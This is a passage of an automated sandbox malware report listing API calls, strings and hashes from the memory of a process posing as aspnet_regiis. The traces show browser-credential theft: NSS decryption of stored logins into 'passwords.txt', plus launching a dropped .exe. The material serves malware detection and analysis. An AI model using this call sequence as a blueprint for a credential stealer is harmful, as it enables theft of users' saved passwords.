                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DFDE
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DFEC
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DFF9
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E000
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E035
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E03C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0E043
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0E04A
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0E065
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E077
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E07E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E122
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E129
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E173
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E17A
                                                                                                                                                                                • Part of subcall function 02A0DB7F: strchr.MSVCRT ref: 02A0DBF2
                                                                                                                                                                                • Part of subcall function 02A0DB7F: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0DCF7), ref: 02A0DC14
                                                                                                                                                                                • Part of subcall function 02A0DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0DC21
                                                                                                                                                                                • Part of subcall function 02A0DB7F: RtlAllocateHeap.NTDLL(00000000), ref: 02A0DC28
                                                                                                                                                                                • Part of subcall function 02A0DB7F: strcpy_s.MSVCRT ref: 02A0DC6F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              APIs
                                                                                                                                                                              • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A922
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,02A373A4,02A3680F), ref: 02A0A9C1
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9D9
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9E1
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9ED
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9F7
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA09
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA15
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0AA1C
                                                                                                                                                                              • StrStrA.SHLWAPI(02A0B824,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA2D
                                                                                                                                                                              • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA47
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AA5A
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AA64
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373A8), ref: 02A0AA70
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AA7A
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373AC), ref: 02A0AA86
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AA93
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,-00000010), ref: 02A0AA9B
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373B0), ref: 02A0AAA7
                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AAB7
                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AAC7
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AADA
                                                                                                                                                                                • Part of subcall function 02A0A7D8: _memset.LIBCMT ref: 02A0A815
                                                                                                                                                                                • Part of subcall function 02A0A7D8: lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A830
                                                                                                                                                                                • Part of subcall function 02A0A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 02A0A838
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A846
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A85A
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A89A
                                                                                                                                                                                • Part of subcall function 02A0A7D8: _memmove.LIBCMT ref: 02A0A8BB
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A8EC
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02A0AAE9
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373B4), ref: 02A0AAF5
                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AB05
                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AB15
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AB28
                                                                                                                                                                                • Part of subcall function 02A0A7D8: lstrcat.KERNEL32(02A36803,02A36807), ref: 02A0A8E5
                                                                                                                                                                                • Part of subcall function 02A0A7D8: lstrcat.KERNEL32(02A36803,02A3680E), ref: 02A0A8FB
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02A0AB37
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373B8), ref: 02A0AB43
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373BC), ref: 02A0AB4F
                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AB5F
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0AB7D
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A0ABAC
                                                                                                                                                                              • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0ABB2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocateAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                              • API String ID: 923042822-347816968
                                                                                                                                                                              • Opcode ID: bf8b5c8f4378d69002d4a1dd9e6653d5cb560fcd3d19df9a7c1a6780fd12cae8
                                                                                                                                                                              • Instruction ID: 22de47082a85a7b6e1819fba0b8099ee1e2e85c2cd22e6f7f6f1dae8b992e447
                                                                                                                                                                              • Opcode Fuzzy Hash: bf8b5c8f4378d69002d4a1dd9e6653d5cb560fcd3d19df9a7c1a6780fd12cae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 26716231980325BBDB016FA4ED89E9E7B79EF49301B104A50FA01B3151DF74DAA5CFA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CB0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CB6F9C9,?,6CB6F4DA,6CB6F9C9,?,?,6CB3369A), ref: 6CB0CA7A
                                                                                                                                                                                • Part of subcall function 6CB0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CB0CB26
                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?,?,6CB1BE66), ref: 6CC56E81
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CB1BE66), ref: 6CC56E98
                                                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000000,6CCBAAF9,?,?,?,?,?,?,6CB1BE66), ref: 6CC56EC9
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CB1BE66), ref: 6CC56ED2
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CB1BE66), ref: 6CC56EF8
                                                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56F1F
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56F28
                                                                                                                                                                              • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56F3D
                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CB1BE66), ref: 6CC56FA6
                                                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000000,6CCBAAF9,00000000,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56FDB
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56FE4
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56FEF
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC57014
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,6CB1BE66), ref: 6CC5701D
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CB1BE66), ref: 6CC57030
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC5705B
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,6CB1BE66), ref: 6CC57079
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC57097
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC570A0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                              • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                              • API String ID: 593473924-707647140
                                                                                                                                                                              • Opcode ID: 8d23c44f4be646eace690484ca7d8038b8a5068282d9ed08d99b499711e8f143
                                                                                                                                                                              • Instruction ID: ef66b07c9f1b3dc5c4cf7f149a26961f0b5f3d48869ae156be0ec9f243e1db16
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d23c44f4be646eace690484ca7d8038b8a5068282d9ed08d99b499711e8f143
                                                                                                                                                                              • Instruction Fuzzy Hash: 015168B1F105116BE70096309C51FBF36669BD2318F544638E80296BC2FB66A93E82E7
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 02A24B1F
                                                                                                                                                                              • __mtterm.LIBCMT ref: 02A24B2B
                                                                                                                                                                                • Part of subcall function 02A247EA: RtlDecodePointer.NTDLL(FFFFFFFF), ref: 02A247FB
                                                                                                                                                                                • Part of subcall function 02A247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 02A24815
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A24B41
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02A24B4E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02A24B5B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02A24B68
                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 02A24BB8
                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 02A24BD3
                                                                                                                                                                              • __init_pointers.LIBCMT ref: 02A24BDD
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24BEE
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24BFB
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24C08
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24C15
                                                                                                                                                                              • RtlDecodePointer.NTDLL(Function_0002496E), ref: 02A24C36
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 02A24C4B
                                                                                                                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 02A24C65
                                                                                                                                                                              • __initptd.LIBCMT ref: 02A24C70
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02A24C77
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                              • API String ID: 3732613303-3819984048
                                                                                                                                                                              • Opcode ID: 0810504ba98427143799ced96fb3e0d045cfd91e1f1d1a657c308ac41669e8b8
                                                                                                                                                                              • Instruction ID: 272facc46670c01a04c83367f532f8839026f83f8562d85114ad722c337882c7
                                                                                                                                                                              • Opcode Fuzzy Hash: 0810504ba98427143799ced96fb3e0d045cfd91e1f1d1a657c308ac41669e8b8
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A315C31D84BB09BDB12AF7DAD4860A3FA5EB59725B000D2AF415D3250DFB4C46ACF50
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4C50
                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4C5B
                                                                                                                                                                              • PR_smprintf.NSS3(6CCBAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4C76
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4CAE
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBE4CC9
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBE4CF4
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBE4D0B
                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4D5E
                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4D68
                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CBE4D85
                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CBE4DA2
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBE4DB9
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBE4DCF
                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
• Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                              • API String ID: 3756394533-2552752316
                                                                                                                                                                              • Opcode ID: 835283579228d4d0ad7ababb0e8c76303c6d10095610757b23a4f47390954fa4
                                                                                                                                                                              • Instruction ID: fb959a98417367d8aee73c36a39385a0efd5bf2d6cda790b3b9db17cccca9ee0
                                                                                                                                                                              • Opcode Fuzzy Hash: 835283579228d4d0ad7ababb0e8c76303c6d10095610757b23a4f47390954fa4
                                                                                                                                                                              • Instruction Fuzzy Hash: 30417BB19001D16BDB115F999C41ABF3675EB9A788F148128EC1A5BB01EB31EC54CBD3
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • _memset.LIBCMT ref: 02A127B1
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A127C3
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36698), ref: 02A127D5
                                                                                                                                                                              • lstrcat.KERNEL32(?,b74ef0d8ce56e494b0d83e1d5be9dbeb), ref: 02A127E7
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3669C), ref: 02A127F9
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A12809
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A366A0), ref: 02A1281B
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A12824
                                                                                                                                                                              • lstrcat.KERNEL32(?,EMPTY), ref: 02A12840
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A366AC), ref: 02A12852
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A12862
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A366B0), ref: 02A12874
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A12881
                                                                                                                                                                              • _memset.LIBCMT ref: 02A128B7
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A12446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A14A8D), ref: 02A12460
                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,02A366B4,?), ref: 02A12924
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02A12932
                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
• Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                              • String ID: .exe$EMPTY$b74ef0d8ce56e494b0d83e1d5be9dbeb
                                                                                                                                                                              • API String ID: 141474312-2994726203
                                                                                                                                                                              • Opcode ID: 8b09beca195b31ab6f067f650b2b348c6961448beb16623930b8c190ded03f66
                                                                                                                                                                              • Instruction ID: 309f6afe3d1997fdee91e275efcac3fa23a14f42070bdebfe9128e418edc4ab6
                                                                                                                                                                              • Opcode Fuzzy Hash: 8b09beca195b31ab6f067f650b2b348c6961448beb16623930b8c190ded03f66
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E81F9B2D80229ABDF21AF64DD84BCE7779BB04314F4044A5BB09B3050DB70AF898F58
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CBC6943
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CBC6957
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CBC6972
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CBC6983
                                                                                                                                                                                • Part of subcall function 6CBC6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CBC69AA
                                                                                                                                                                                • Part of subcall function 6CBC6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CBC69BE
                                                                                                                                                                                • Part of subcall function 6CBC6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CBC69D2
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CBC69DF
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CBC6A5B
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBC6D8C
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6DC5
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6DD6
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6DE7
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBC6E1F
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6E4B
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6E72
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6EA7
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6EC4
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6ED5
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6EE3
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6EF4
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6F08
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6F35
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6F44
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6F5B
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6F65
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBC781D,00000000,6CBBBE2C,?,6CBC6B1D,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C40
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBC781D,?,6CBBBE2C,?), ref: 6CBC6C58
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C6F
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBC6C84
                                                                                                                                                                                • Part of subcall function 6CBC6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBC6C96
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBC6CAA
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6F90
